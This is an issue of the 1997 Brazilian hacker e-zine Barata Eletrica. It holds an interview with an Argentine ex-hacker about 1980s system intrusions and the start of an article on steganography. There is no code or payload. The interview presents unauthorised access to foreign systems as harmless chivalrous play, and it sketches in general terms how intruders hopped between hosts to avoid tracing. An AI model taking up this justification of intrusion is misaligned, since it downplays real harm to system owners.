Barata Eletrica15:(BE15TXT.DOC):26/05/1997 << Back To Barata Eletrica15

____ _ ______ _ _ _ | _ \ | | | ____| | | | (_) | |_) | __ _ _ __ __ _| |_ __ _ | |__ | | ___| |_ _ __ _ ___ __ _ | _ < / _` | '__/ _` | __/ _` | | __| | |/ _ \ __| '__| |/ __/ _` | | |_) | (_| | | | (_| | || (_| | | |____| | __/ |_| | | | (_| (_| | |____/ \__,_|_| \__,_|\__\__,_| |______|_|\___|\__|_| |_|\___\__,_| BARATA ELETRICA, numero 15 Sao Paulo, 21 de maio, 1997 --------------------------------------------------------------------------- Creditos: -------- Este jornal foi escrito por Derneval R. R. da Cunha (barataeletrica@thepentagon.com http://www.geocities.com/SiliconValley/5620 http://barata-eletrica.home.ml.org) Com as devidas excecoes, toda a redacao e' minha. Esta' liberada a copia (obvio) em formato eletronico, mas se trechos forem usados em outras publicacoes, por favor incluam de onde tiraram e quem escreveu. DISTRIBUICAO LIBERADA PARA TODOS, desde que mantido o copyright e a gratu- idade. O E-zine e' gratis e nao pode ser vendido (senao vou querer minha parte). Para contatos (mas nao para receber o e-zine) escrevam para: barataeletrica@ThePentagon.com <-- provavelmente minha conta definitiva curupira@2600.com <-- minha mais nova conta rodrigde@spider.usp.br wu100@fim.uni-erlangen.de Correio comum: Caixa Postal 4502 CEP 01061-970 Sao Paulo - SP BRAZIL Numeros anteriores: ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica gopher://gopher.eff.org/11/Publications/CuD/Barata_Eletrica http://www.eff.org/pub/Publications/CuD/Barata_Eletrica ou ftp://etext.archive.umich.edu/pub/Zines/BerataElectrica gopher://gopher.etext.org/00/Zines/BerataElectrica (contem ate' o numero 8 e e' assim mesmo que se escreve, erro deles) ATENCAO - ATENCAO - ATENCAO Web Page do Fanzine Barata Eletrica: http://www.geocities.com/SiliconValley/5620 http://barata-eletrica.home.ml.org Contem arquivos interessantes. ATENCAO - ATENCAO - ATENCAO NO BRASIL: http://www.inf.ufsc.br/ufsc/cultura/barata.html http://www.di.ufpe.br/~wjqs http://www.telecom.uff.br/~buick/fim.html http://tubarao.lsee.fee.unicamp.br/personal/barata.html ftp://ftp.ufba.br/pub/barata_eletrica (Normalmente, sao os primeiros a receber o zine) MIRRORS - da Electronic Frontier Foundation onde se pode achar o BE /pub/Publications/CuD. UNITED STATES: etext.archive.umich.edu in /pub/CuD/Barata_Eletrica ftp.eff.org in /pub/Publications/CuD/Barata_Eletrica aql.gatech.edu in /pub/eff/cud/Barata_Eletrica world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica uceng.uc.edu in /pub/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica wuarchive.wustl.edu in /doc/EFF/Publications/CuD/Barata_Eletrica EUROPE: nic.funet.fi in /pub/doc/cud/Barata_Eletrica (Finland) (or /mirror/ftp.eff.org/pub/Publications/CuD/Barata_Eletrica) ftp.warwick.ac.uk in /pub/cud/Barata_Eletrica (United Kingdom) JAPAN: ftp.glocom.ac.jp in /mirror/ftp.eff.org/Publications/CuD/Barata_Eletrica www.rcac.tdi.co.jp in /pub/mirror/CuD/Barata_Eletrica OBS: Para quem nao esta' acostumado com arquivos de extensao .gz: Na hora de fazer o ftp, digite binary + enter, depois digite o nome do arquivo sem a extensao .gz Existe um descompactador no ftp.unicamp.br, oak.oakland.edu ou em qualquer mirror da Simtel, no subdiretorio: /SimTel/msdos/compress/gzip124.zip to expand it before you can use it. Uma vez descompactado o arquivo GZIP.EXE, a sintaxe seria: "A>gzip -d arquivo.gz No caso, voce teria que trazer os arquivos be.??.gz para o ambiente DOS com o nome alterado para algo parecido com be??.gz, para isso funcionar. ========================================================================== ULTIMO RECURSO, para quem nao conseguir acessar a Internet de forma direta, mande carta (nao exagere, o pessoal e' gente fina, mas nao e' escravo, nao esquecam aqueles encantamentos como "please" , "por favor" e "obrigado"): fb2net@netville.com.br hoffmeister@conex.com.br drren@conex.com.br wjqs@di.ufpe.br aessilva@carpa.ciagri.usp.br dms@embratel.net.br clevers@music.pucrs.br rgurgel@eabdf.br patrick@summer.com.br ######################################################################### ASSINATURA DO BARATA ELETRICA VIA CORREIO ELETRONICO Para receber o fanzine via email, mesmo quando podendo pegar ele na rede. Estou montando um esquema no qual a pessoa envia email para: rato.cpd@digicron.com com os seguintes dizeres, no corpo da carta: assinatura BE seu-email@fulano.xxxx.xx entendendo claro que seu email e' seu e-mail, nao a string seu-email. Isso porque nao vou ler a correspondencia. Qualquer coisa alem disso sera' ignorada. Como mesmo assim vou precisar de gente para me ajudar a distribuir, as pessoas que tiverem boa vontade tambem podem participar, enviando email para o mesmo endereco eletronico com o subject: ajuda BE seu-email@fulano.xxx.xx Provavelmente nao havera' resposta, ja' que e' um acochambramento que to planejando. A cada novo numero, vou sortear os voluntarios que irao receber primeiro e depois vao distribuir para os preguicosos ou distrai- dos ou super-ocupados que querem receber o lance sem fazer ftp ou usar WWW. Mas aviso: sera' feita a distribuicao em formato uuencodado. Aprendam a usar o uudecode. E nao ha' garantia que a coisa vai funcionar. A assinatura comeca a partir do numero seguinte. OBSERVACAO: Tem muita gente que esta' enviando carta so' com assinatura no conteudo e mais nada. As pessoas que nao seguirem as instrucoes acima a risca perigam nao receber. Agradeco ao enorme numero de voluntarios p. distribuicao. ######################################################################## CREDITOS II : Sem palavras para agradecer ao pessoal que se ofereceu para ajudar na distribuicao do E-zine, como os voluntarios acima citados, e outros, como o sluz@ufba.br (Sergio do ftp.ufba.br), e o delucca do www.inf.ufsc.br Igualmente para todos os que me fazem o favor de ajudar a divulgar o Barata em todas as BBSes pelo Brasil afora. AGRADECO TAMBEM AOS QUE QUEREM ME AJUDAR, "HOSPEDANDO" O EZINE EM SUAS PAGINAS OU FTP-SITES. A PARTIR DO PROXIMO BE, COMECO A COLOCAR OS URLS DESDE QUE NAO HAJA UM LANCE COMERCIAL (nao quero meu fanzine com propaganda de qualquer especie, nem do provedor) OBSERVACAO: Alguns mails colocados eu coloquei sem o username (praticamente a maioria) por levar em conta que nem todo mundo quer passar por colaborador do BE. Aqueles que quiserem assumir a carta, mandem um mail para mim e numa proxima edicao eu coloco. ########################################################################### INTRODUCAO ========== Como de costume, explicar um pouco porque esse intervalo de tempo entre uma edicao e outra... terminei a ultima edicao e fui para a Argentina, via RGS, rapidinho. Estava afins de encontrar a mesma mocada e tambem aproveitar um pouco o as parcas ferias que minha bolsa de aperfeicoamento me dava. Uma merda. Uma porque nao consegui chegar la' antes do ano novo. Duas porque cheguei la' com poucos dolares, fui no Banco de Boston sacar com um VISA- Ourocard do Banco do Brasil que tive um p(*) dum trabalho pra conseguir. Sabe o que rolou? Nao me sacaram nenhuma grana e ainda por cima me falaram que o limite de saque do cartao tava esgotado. E isso com o guardinha do lado, pronto pro escandalo, numa sexta-feira. E eu que tinha uma boa imagem da Argentina, diminuiu um pouco. Puxa so' arrumei o cartao pra usar em viagem...nao tinha usado nem na Internet. Fazer o que? Mudar de cartao e levar mais cash, na proxima. Encontrei o Bomsembiante, que NAO ficou rico com a historia de fazer a "Virus Report". Pelo contrario, disse que quando leu meu artigo na 2600 - Hacker Quaterly (mais ou menos aquilo q ta' na minha pagina na geocities) teve inveja da minha ideia de nao publicar em papel. A grafica obrigava a imprimir o minimo de 10.000 numeros vender bem menos do que isso. Nao ficou mal, mas parou com a publicacao. Prometeu me mandar recortes da cena hacker na Argentina incluindo os news clips da Convencao de Hackers de outubro de 94. Como ta' demorando um pouco, se alguem puder me ajudar com isso, agradeco. Durante o inicio do ano descobri que tao surgindo novos zines. E ate' que chamo "ruptura". Alguns caras decidiram que o que eu escrevo nao e' bom, pra dizer o minimo... acho saudavel. Todo mundo tem direito a liberdade de opiniao e expressao. Nao importa se o cara e' "ista" de qualquer tipo. Todos tem esse direito. Pouco saudavel, o cara que enviou bomba de email pra esquina das listas.. nao respeitou essa liberdade. E botou meu nome no meio. Otimo. So' acho q se algum "araponga" comecasse 1a lista de possiveis e futuros "vandalos da rede" iria ficar na moita so' anotando os emails de quem fala mal do BE. Nao e' muita gente. Vigiar todo mundo que le^, por outro lado, e' mais complicado. Sempre achei que estava "desbravando" o caminho pra muita gente. Sim porque demorou e como demorou a aparecer outro e-zine, depois do meu. Qualquer pessoa com pouco talento, pode e deve ser capaz de escrever algo melhor. Talvez nao com tanta penetracao e publico. De resto, fico so' pensando naquele ditado: "a inveja e' a arma do incompetente". Tem cara q. nao sabe disso e fica escrevendo umas cartas do tipo: "tu nao e' de nada, eu sou melhor". E dai'? Qualquer cara de 16 anos tem condicao de se tornar muito melhor do que eu. Simplesmente porque tem mais tempo pela frente. Talvez nem tenha problemas de emprego. Eu, eu tenho um nome a zelar, contas pra pagar, etc.. Fico chateado, mas nao muito. Quando comecei o fanzine, tinha que explicar tudo, ate' como usar PGP. Agora nao. Ja' tem uma atmosfera favorecendo ate' gente que contribua para coisas com a quais nao quero mexer. Afinal de contas, queima o filme falar "como fazer uma bomba caseira". Mesmo que um cara que fez isso aqui em Sampa tenha aprendido isso no cinema. Estou editando o Barata pensando no fato de que se a pessoa quiser, pode perfeitamente procurar sozinha suas proprias receitas... Prefiro que a pessoa aprenda a "pescar" na rede, ao inves de dar o peixe na mao. E.. Antes reputacao de burro do que de demente ou vandalo. A razao da demora do numero foi que arrumei um lance montando um servidor internet. Ja' to por dentro de trocentas manhas que antes nao tinha. E como sou ignorante, meu Deus! A gente so' descobre fazendo as coisas. Consome um pouco de tempo aprender a botar algo na rede. Depois piora. Ruim mesmo e' que to com indefinicao de moradia tambem. Mas tudo bem. Pelo menos o diploma ta' encaminhado. Meu proximo desafio e' achar um patrocinador pra ir nos encontros de Hackers que vao rolar la' fora. E terminar de escrever meu livro sobre hackers. A vida e dura... Nota: teve uma reporter de uma revista cujo nome nao vou falar que escreveu um artigo sobre um "hacker" contando a vida dele... o^ coisa ruim. Mais uma vez a imprensa quer mesmo e' retratar vandalismo. So' a escolha de palavras: "prisioneiros", "vinganca", etc quase ignora que existe etica hacker. Legal porque tem alguns elementos tipicos de alguns hackers: se gabar pra caramba de coisas que normalmente uma pessoa nao faria. Em grupo, sim. Um poderia colecionar senhas de trocentos provedores. Outro poderia colecionar esquemas de "vinganca". E ai' por diante. Nao sao coisas mutuamente excludentes, mas a materia parecia coisa demais pra um cara so' fazer. De qualquer forma o perigo sao os idiotas que vao tentar imitar a revista, achando que aquilo e' um "hacker". Vao e' detonar para todos os outros que nao pensam em ser vandalos. INTRODUCAO CAVALEIROS DA REDE - Reportagem com um hacker ESTEGANOGRAFIA - A ARTE DE ESCONDER INFORMACAO HISTORIA RESUMIDA DO BARATA ELETRICA PARA SUA PROTECAO: O GRANDE IRMAO ESTA' VINDO UMA SEMANA NA VIDA DO ADMINISTRADOR DE SUPORTE DO INFERNO ULTIMAS NOTICIAS DO MITNICK ALGUNS ENCONTROS DE HACKERS NO MUNDO TODO DEMO CODING: ARTE, HACKING OU OQUE? NEWS - PIADAS - BUGS - LINUX - DICAS - ETC.. BIBLIOGRAFIA ---------------------------------- CAVALEIROS DA REDE - Reportagem com um hacker ============================================= A revista argentina "Virus Report" entrevistou um dos primeiros hackers do pais, cujo nome verdadeiro se mantem segredo por motivos obvios. Seu nome de guerra e' "Chacal". O que se segue e' a transcricao da conversa que foi mantida com ele. (Esta reportagem foi publicada com permissao do editor da revista, Fernando Bomsembiante) VirusReport - Qual sua idade e a que se dedica agora? Chacal - Naturalmente, esta informacao nao se pode dizer abertamente. A idade... beirando os trinta. Ocupacao atual... tenho uma empresa de consultoria na area de informatica, vinculada com o setor de comunicacoes e redes. E quando era mais jovem me dedicava a hackear: acredito que este e' o objetivo desta entrevista. VR - Mais ou menos em que ano e que idade terias? CH - O pico da atividade foi no ano de 87. Nessa epoca tinha 20 e poucos.. era outra etapa da vida na qual tinha mais tempo para dedicar a este tipo de coisa. VR - E porque deixou de faze-lo? CH - Por um lado, porque e' uma atividade que leva muito tempo. Por outro lado, porque de alguma maneira pude reestruturar todos os conhecimentos que adquiri nessa etapa de hacking. Capitalizei-os para dedicar-los a atividade produtiva e nao ao hacking, que e' algo de hobby, uma diversao. VR - Para voce, o que e' ser hacker? CH - Muito se disse sobre o que e' ser um hacker. O conceito popular de hacker diz que e' uma pessoa que acessa outros computadores de forma nao ortodoxa, beirando a ilegalidade, depende de como o considera. O personagem popularizado por peliculas como "Jogos de Guerra", que utilizando os computadores e redes telefonicas para entrar no Pentagono, na Nasa .. na realidade se pode acessar diferentes tipos de lugares; claro que todos querem chegar ao pentagono ou a NASA mas tambem tem centros de informacao, empresas, companhias, museus, universidades.. VR - Que tipo de coisas fazia nos seus anos dourados? CH - A atividade do hacker e' investigar onde se pode entrar, como entrar, como violar a seguranca dos mecanismos de acesso as comunicacoes, as universidades, as empresas ou centro governamentais no exterior. Uma vez que se esta' ali e' mais uma atividade de voyer, um jogo de xadrez contra a seguranca do lugar onde se pretende violar. E' entrar, ver e mais nada. A intencao do hacker, pelo menos do hacker inteligente, nao e' destruir informacao, isso e' um pouco infantil. Acessar um sistema para destruir informacao de gente inocente que nao participam no jogo nao tem graca nenhuma. VR - Mas existe gente que quer entrar nos BBS para apagar seus discos... CH - Isto seria como ir ate' a porta de um colegio e roubar doce de crianca. Nao tem sentido. Hackear uma BBS e' uma estupidez. Isto e' um servico que uma pessoa ou instituicao da' para que outros possam comunicar-se. Hackea-la e destrui-la? Nao, e' ridiculo. Cada um busca o desafio de acordo com sua capacidade, o que hackea uma bbs sabe que isso e' o seu limite. O verdadeiro hacker, ou pelo menos o que tem um pouco de capacidade intelectual, pretende acessar alguma universidade no estrangeiro, ou um centro europeu de investigacoes nucleares ou uma companhia mineira na Africa do Sul. Cada qual sabe quais sao as metas que se planeja. O objetivo nunca e' destruir, porque o hacker quer essencialmente passar despercebido. E' uma satisfacao intelectual. Eu sei que pude entrar num sistema, pronto. Ao final se compartilha com um circulo de iniciados. Tem essa caracteristica um pouco "mistica". VR- E' muito lindo este teu discurso de pacifismo, mas ha' contas de telefone enorme pagas por algum outro, chamadas ao exterior, acessos ilegais e uso de bancos de dados no estrangeiro.. tudo isto custa dinheiro e e' evidente que voces nao pagam. CH- Poderiamos considera quase como uma travessura. O uso que um hacker pode fazer de um sistema no estrangeiro, de um ponto de vista legal, e' uma contravencao. Na realidade, e' um uso de tempo de computador que nao representa um custo importante para as empresas que prestam o servico e que se feito com moderacao nao passa de ser uma transgressao. E' parte dos custos que a empresa pode assumir, insisto, quando feito moderadamente e de forma adequada. Pois aquele que entra num sistema e o utiliza para conseguir informacao tecnica, ou para comunicar-se com gente com a qual faz intercambio de informacoes nao esta' criando prejuizo significativo. Um supermercado assume que vai ter um custo porque uma senhora passou com um menino e quebrou uma garrafa; sao custos que se assumem. Ja' esta' calculado e nao representa um problema importante. Nos casos de empresas as quais assessoro e pudem chegar a bancar este tipo de servico, se calcula o custo de infiltracoes ou de um abuso do sistema. VR- Agora tens uma posicao bastante dentro da lei. Ha' alguns anos, quando eras hacker, pensava do mesmo jeito ou era um pouco mais anarquista? CH- Provavelmente era um pouco mais anarquista. Igualmente, de qualquer jeito, hoje estou a favor do livre fluxo da informacao. Creio que e' importante acessar a informacao, que os computadores e as comunicacoes entre computadores permitam, como dizia Marshall Mac Luhan, uma "aldeia global" (Global Village, nao rede globo - nota do editor). Insisto sempre: mesmo quando me dedicava a hackear, fazia isso com criterio, com uma especie de sentido de dever. Era um pouco romantico o que faziamos nessa epoca, um desafio com certas regras de jogo limpo. Eramos cavaleiros das redes de computadores. O mesmo talvez se sucede em qualquer atividade: quando isso se massifica, comeca a haver todo tipo de pessoas, boas e ma's, e se perde muitas vezes o sentido original. A pessoa que ha' um mes atras nao sabia nada de computadores e sem muito custo conseguiu acessar uma informacao tecnica e de repente pode meter-se em uma rede em qualquer lugar do mundo nao tem uma consciencia bem formada. O que posso recomendar a qualquer um que se interesse por este tipo de atividades transgressoras e' que a desfrute, que investigue e que va fazendo as coisas por sua conta, de modo sao e com boa fe', que e' realmente divertido. E' como jogar xadrez fazendo trapaca, nao tem nenhuma graca. A verdadeira graca esta' em jogar respeitando as regras do jogo. Isto funciona igual, as regras do jogo sao: quebrar a cabeca para conseguir a informacao, conseguir acessar e atuar cavalheirescamente, igual a um bom jogador de xadrez. VR - Penso que uma pessoa nao diz "vou ser um hacker" e no outro dia comeca a entrar nos bancos de dados no exterior. Como foi teu inicio no tema? CH - Nos velhos tempos, as coisas eram muito mais complicadas do que hoje. Na epoca da qual estamos falando havia muito poucos modens e muita pouca informacao. Era tudo um trabalho de folego. Tinha que se comecar do zero, investigando e descobrindo, comprando revistas estrangeiras para interar-se donde havia sistemas disponiveis, ler muitissimo, e de pouco em pouco, podia se interar de onde era possivel acessar. Ai se buscavam as formas de chegar... muitas vezes se paga parte da comunicacao e se acessa pelo outro lado por diferentes partes da mesma coisa. No fim, hoje esta' muito mais vulgarizado e ha' um montao de pseudo-hackers que obteem informacao de um amigo que sabe um pouco mais, passa adiante uma serie de arquivos completos, entram, nao sabem como, nao sabem o que fazem, o que e' o tipo de coisa que nao tem graca. Os usuarios sao muito pouco conscientes da possibilidade de que outra pessoa descubra suas chaves. Investigando um pouco, testando, com muitas horas, com muito tempo, muito trabalho, vai se chegando. Na medida que um acessava algo no estrangeiro, comecava a entrar em "redes" de hackers onde se intercambiava informacao. Um descobria um computador na Tanzania de uma empresa em processo de instalacao e troca essa informacao por um acesso a uma companhia no Japao, e ai' entao consegue informacao porque esse computador no Japao se comunica com outro na Alemanha; entao, sabendo muito de sistemas, se busca arquivos que deem uma pista de como se esta' comunicando (atraves desse computador) e se tenta usar os mesmos mecanismos. Entao se entra nesse computador da Alemanha fazendo-se passar pelo computador do Japao e assim se vai armando uma corrente na qual se vai encontrando coisas as quais se pode acessar. VR - Penso que sua posicao economica atual, bastante boa, se deve ao fato de ter se tornado hacker em algum momento da vida? CH - Indiretamente sim, porque a atividade de hacking me permitiu adquirir uma serie de conhecimentos... VR - Nao me refiro por isto que tenha tido a experiencia de roubar um banco... CH - Nao, nao, por suposicao, isto nao. Adquiri muitos conhecimentos, que depois fui capaz de usar. Hoje em dia, pude desenvolver tecnicas de seguranca baseadas nos meus conhecimentos de como acessar outros sistemas. Esse conhecimento interno da coisa me permite desenvolver sistemas que sao -entre aspas- infaliveis. Sempre entre aspas porque na realidade nao existe sistema de seguranca perfeito. De certo modo e' o mesmo que perguntar quem e' o melhor especialista em seguranca de caixas fortes: so' pode ser o ladrao de cofres. Esse e' que mais vai saber como fazer uma caixa inviolavel. E' algo parecido. Esses conhecimentos depois podem ser aplicados para fazer o contrario. Nao deixa de ser parte deste jogo de xadrez, nada mais do que no principio se joga de um lado do tabuleiro e depois se troca de lado. Antes o jogo era violar sistemas e agora e' criar sistemas seguros e oferecer este servico as empresas. VR - Quais outros hackers voce conheceu? CH - Aqui na Argentina havia um grupo de hackers de importancia media. Me recordo do famoso Dr. Trucho, a Nibbier, gente que fazia.. VR - Voce pertencia a este grupo? CH - Sim, digamos que intercambiavamos informacao, ou encaravamos projetos juntos. Inclusive o famoso "PUA", Piratas Unidos Argentinos, que surgiu como uma mancha no inicio e tomou certa envergadura depois. Os hackers argentinos que havia neste momento eram hackers conscientes, e essa consciencia surgiu de ter trabalhado desesperadamente. Nao havia amigos ou fadas madrinhas que nos brindassem com arquivos cheios de informacao. No exterior, por exemplo, conheci muitos hackers importantes: alemaes (entre os quais se contavam o pessoal do Chaos Computer Club), ingleses, italianos, australianos e, obviamente, americanos. Nesse momento existiam diferentes lugares onde os hackers trocavam informacao, pontos de reuniao ou grandes bancos de dados somente conhecidos por hackers de certo nivel para cima e uma lenda para os outros que tentavam acessa-los. Eram lugares secretos que uns diziam que existiam, que tinham um amigo que alguma vez os tinha visto e outros diziam que nao, que na realidade eram miragem. Alguns eram fantasia e outros realidade. VR - Esses lugares eram maquinas, bancos de dados? CH - Sim, computadores escondidos nas redes mundiais de comunicacao, com acessos que nao estavam nos guias telefonicos de computadores do mundo... VR - E ai' se intercambiava informacao... CH - Desse jeito, ali podia se encontrar desde os codigos para se movimentar os satelites dos EUA, deixados por gente do Chaos Computer Club ate' como se infiltrar nas comunicacoes telefonicas da Australia ou os codigos de acesso a uma companhia mineradora sul-africana. Tambem havia informacao tecnica vinculada com as comunicacoes, com os modens, que podiam ser utilizadas nao somente para hacking, senao para atividades legais. VR - Pode me dizer alguns nomes destes lugares onde se encontravam? CH - Um famoso era Altos, um lugar na Alemanha que ninguem conhecia e todos mencionavam. Outro lugar era AMP, Adventure Multi Player, um jogo de aventuras multiusuario na Inglaterra que alem de ser um jogo de aventuras era um lugar de intercambio de informacao. VR - Tens alguma anedota que pode contar de seus dias de hacker, algo divertido? CH - Sim, havia coisas divertidas... por exemplo, para evitar o rastreamento era comum entrar com algo que era chamado de PAD, computadores que permitem a entrada e gerar nova comunicacao com outro lugar. Os hackers mais paranoicos usavam 4 ou 5 PADs para fazer suas comunicacoes. Como anedotas locais, havia naquele tempo na Argentina um servico de informacoes com o qual tinhamos uma disputa, coisa de crianca. Nos acessavamos seu sistema e pediamos que reconhecessem nossa existencia abrindo uma conta em nome de "Grupo Piratas Unidos Argentinos" (nota do editor: do meu ponto de vista, algo idiota e facil d ser rastreado). Ha anedotas com o pessoal do "Chaos Computer Club" de Hamburgo, que se meteram nos computadores dos EUA e, quando se deram conta de que haviam sido rastreados, decidiram sacar uma especie de seguro de vida ante o risco que fossem desaparecer ou terminar com "perdas extremas", como e' o eufemismo que a CIA usa nestes casos. Algum tempo depois, alguns deles tiveram acidentes inexplicaveis... muitas anedotas nao podem ser contadas porque envolvem conhecimentos que nao sao para difundir. VR - Alguma vez voce teve algum problema deste nivel ou ameacas? CH - Nao, a nivel de ameacas nao, mas situacos engracadas. As vezes a atividade hacker, mesmo inocente pode atrapalhar negociacos complicadas entre empresas ou pode provocar outros tipos de incovenientes, onde muitas vezes o mesmo hacker nao sabe o que e' que se passa, problemas empresariais vinculados com custos de comunicacoes e coisas assim. Isso e' saudavel de certo modo. Levando a um plano idealista, o hacker bem intencionado e' uma especie de Robin Hood da informacao, que permite que todo mundo acesse a ela, coisa que de outra forma permaneceria oculta. ESTEGANOGRAFIA - A ARTE DE ESCONDER INFORMACAO ============================================== E' a parte da criptografia que lida com (basicamente) o ocultamento da mensagem. Compreende tambem metodos alternativos de transmissao e uma serie de outras sub-ciencias que nao vou detalhar aqui, por absoluta falta de tempo. E' talvez um dos ramos da criptografia que tem a maior aplicacao no dia-a-dia. Como diversao, pode ser encontrado na secao de caca-palavra de qualquer jornal ou revista. E' usada no ocultamento de marcas de copyright (aquela foto que voce fez download, mas bem miudinho conserva o URL pra direitos autorais). Etc, etc.. Pode-se tracar a estenografia na historia desde a antiguidade, quando 1 grego tatuou a mensagem na cabeca raspada de 1 escravo. Quando o cabelo cresceu, este foi enviado atraves das linhas inimigas sem levantar suspeitas. Tudo bem q teve a cabeca raspada de novo, depois, para o destinatario ler a mensagem... A diferenca basica entre a criptografia e a estenografia e' simples: com a criptografia, se eu recebo uma mensagem que fulano me pede para entregar a ciclano, imediatamente fico consciente de que: 1) Fulano e ciclano tem seus segredinhos 2) Fulano e ciclano tem um codigo secreto p. se comunicar 3) Fulano e ciclano nao confiam em mim para determinados assuntos 4) " e " podem estar com algo em andamento, coisa q nao posso saber.. Mesmo que a mensagem nao seja nada disso, afinal de contas todo mundo tem direito a um pouco de privacidade (e tem mesmo, ta' na constituicao), o fato e' que o uso de mensagem secreta num canal aberto pode ser suspeito. Inclusive um amigo me relatou que pode ser usado como prova num tribunal de algo conhecido como "formacao de quadrilha". Pode dar cana, se houver algo como serio (exemplo: consumo de substancia alteradora do funcionamento cerebral, vulgo entorpecente ou "bagulho", etc, consulte seu advogado). Voltando ao ponto inicial, o uso de criptografia evidencia comunicacao privada e secreta. Mas o uso de estenografia nao, porque a primeira vista nao existe a mensagem secreta. Ela esta' invisivel aos olhos de um nao- iniciado. O conteudo da mensagem tem um sentido claro para o publico e um oculto para um grupo restrito. Leiam os textos abaixo. Subject:[PIADAS-L] Carta de um soldado a sua noiva. Nao imagina, meu amor como estamos ca- minhando alegres, apesar de estarmos esma- gados nesta luta, estamos indo mesmo a mer- ce^ de Deus; nao precisa ficar contraria- da, minha querida, pois nao ha priva- coes, que logo termina a situacao marca- da para tanta gente, todos querem ca- minhar a frente, varios noivos estao a nave- gar ao mesmo tempo, eh uma lastima, ca- bos, sargentos, na flor da idade esma- gados por toda parte, ha sem duvidas fe- ridos que gemem; moribundos provocan- do, invadindo lares, estamos atras de peni- tenciarias, pedindo ajuda a pobres e ri- cos de todo o mundo. Abracos de seu noivo que mi- mosamente olha e bei- ja a todo instante no seu retrato. (leia de novo o texto, linha sim, linha nao) Subject: [PIADAS-L] Anuncio Neste estabelecimento moderno e de luxo, encontra-se pu- blicamente em exposicao as mais lindas e confortaveis bo- tas baixas, altas e apertadas, por preco de ocasiao. Sa- patos de verniz, camurca, ultimos modelos. Piteiras ameri- canas, bonitas e elegantes, finas e especialmente para fu- mar em saloes, bares e cafes elegantes. Estamos a ven- der desde R$ 1,00. Nossa especialidade =82 exclusiva em cu- ecas, camisetas, lencos e blusoes. De mocinhas a rapazes de 14 anos, a partir de R$ 0,50. Pu- xadores, travessas nacionais e estrangeiras. Jogos de mon- taria completa, para diversos precos. Temos lindos ca- nivetes, artigos de papelaria, canetas cartinagens, ba- ralhos de diversos tipos e tamanhos, bem como umas bo- necas de veludo e pele de raposa. Fios, trancas e tran- cetas especiais, chegadas diretamente de Paris. Se voce chegou ao final desse anuncio e nao se interessou por nenhum artigo, releia-o pulando uma linha. Agora para de rir e presta atencao. A mensagem tem um duplo sentido e duas informacoes diferentes. Uma e' a obvia, que nao precisa necessariamente ser verdadeira, basta fazer sentido. E a outra mensagem que poderia, num caso ficticio, ser ate' verdadeira, um soldado servindo no front, com problemas ... esquece. E' uma coisa que as vezes provoca um pouco de paranoia, em tempos de censura. Porque uma mensagem simples, tipo "vou hoje" e' uma coisa. Agora dentro de determinados contextos, significam coisas completamente diferentes. "Vou hoje", vindo de um doente terminal pode significar algo completamente diferente do "vou hoje" de um cara num escritorio de suporte de micros. Tudo depende do contexto. Entao, aqueles com mais idade vao se lembrar daquela musiquinha de natal da TV: "Quero ver, voce nao chorar, nao olhar p. tras, nem se arrepender do que faz... Quero ver o amor vencer, mas se a dor nascer, voce resistir e sorrir ..." E tem gente ate' hoje que quando se lembra, canta com saudade. Pergunte a qualquer um entre 20 e 50 anos q. assistia tv nos anos 70 e 80. Mo' ibope. Porque nao passa mais propaganda com ela? Bom, teve alguem q.chamou essa musica de "Melo^ do sexo anal". Pronto. Vai saber se o cara pensou nisso quando fez a musica. Mas se encaixou direitinho num outro contexto. Alias o grande merito de obras artisticas ( e ja' nao estou mais falando da musiquinha) e' exatamente ter essa segunda mensagem escondida. "Julinho da Adelaide" a.k.a. (Also Know As - Tambem Conhecido Como) Chico Buarque, fez uma musica cujo refrao era "voce nao gosta de mim, mas sua filha gosta". O pessoal levou p. outro contexto, ate' q. lembraram q. a filha do (ex) Presid. Geisel havia dito numa reportagem que gostava das mu- -sicas do Chico Buarque, exemplo d mais censurados pela ditadura. A musica popular brasileira ta' cheia de exemplos desse tipo, onde muda a entonacao, muda o contexto e a verdadeira mensagem aparece. Dizem, nao sei se e' verdade, que um disco do Milton Nascimento, no tempo da Ditadura, escondia um grito clamando "Lamarca" (deputado morto durante a repressao). Pra escutar, era necessario tocar o LP ao contrario. O grupo "Lingua de Trapo" teria feito algo semelhante: pos uma mensagem "voce esta' estragando seu disco" quando se tocava ao contrario. Outros tipos de estenografia: a historia de um grupo de surfista de um "point" no litoral norte paulista (ou qualquer outro, esqueci de onde li isso). A turma nao aguentava mais a invasao de surfista de "escritorio" tentando se enturmar. Entao mudavam a giria toda semana. Desse jeito sabiam quem era da area ou tava so' fingindo. Sobre formas alternativas de transmissao de mensagem, ha' milhares. E' o que se chama de "transmissao de dados por canais de baixa seguranca". Tipo comunicacao entre habitantes de prisoes, internatos, esses lances. Uma das historias mais interessantes e' de um cara que ficou preso na Ilha Grande por conta da ditadura do Getulio Vargas. Os prisioneiros nao ficavam em celas superlotadas como hoje, acredito. Como sempre acontece, o pessoal bolou um sistema interno p. se comunicar. Usando baratas. Por incrivel que pareca. Como se trata de um inseto com o olfato altamente desenvolvido, "sentia" o caminho ate' um pedaco de biscoito com facilidade. Era amarrado a uma linha de papagaio e pronto. Quando chegava ao local, o receptor da "barata" puxava o fio com a mensagem. Nem os proprios prisioneiros acreditavam que um bicho tao nojento podia ser adestrado e demonstrar inteligencia, mas a coisa funcionava. So' pra se ter uma ideia do alcance das mil e uma formas que uma mensagem pode ser ocultada, os EUA na 2a Guerra tinham um verdadeiro servico de inteligencia so' dedicado a abrir e vistoriar correspondencia entrando e saindo do pais. Todas as cartas, telegramas eram abertos. Tradutores para quaisquer linguas conhecidas eram requisitados, para se descobrir possiveis espioes. Fotos, desenhos, mesmo feitos por criancas, eram sumariamente "apreendidos". Isso porque um desenho tambem pode esconder informacao, vide o exemplo do fundador do escotismo (durante seu tempo a servico da coroa britanica, antes da primeira guerra), Badden Powell, fez todo um mapa de fortificacoes alemas disfarcado de desenho de borboletas (o disfarce dele era de "cacador de borboletas"). Qualquer carta contendo algo estranho, ou informacao fora do comum era "atrasada" ate' se ter certeza do conteudo inofensivo. Uma piada da epoca fala que um dos encarregados da censura desconfiou de um telegrama do tipo "papai morreu". Alterou e enviou outro, com o conteudo: "papai faleceu". Ai' o destinatario replicou com a mensagem "papai morreu ou faleceu?". Tudo isso e ainda assim era e e' complicado. A Alemanha desenvolveu um "kit" de fotografia, capaz de reduzir o negativo de uma foto ate' o tamanho de um alfinete, os chamados 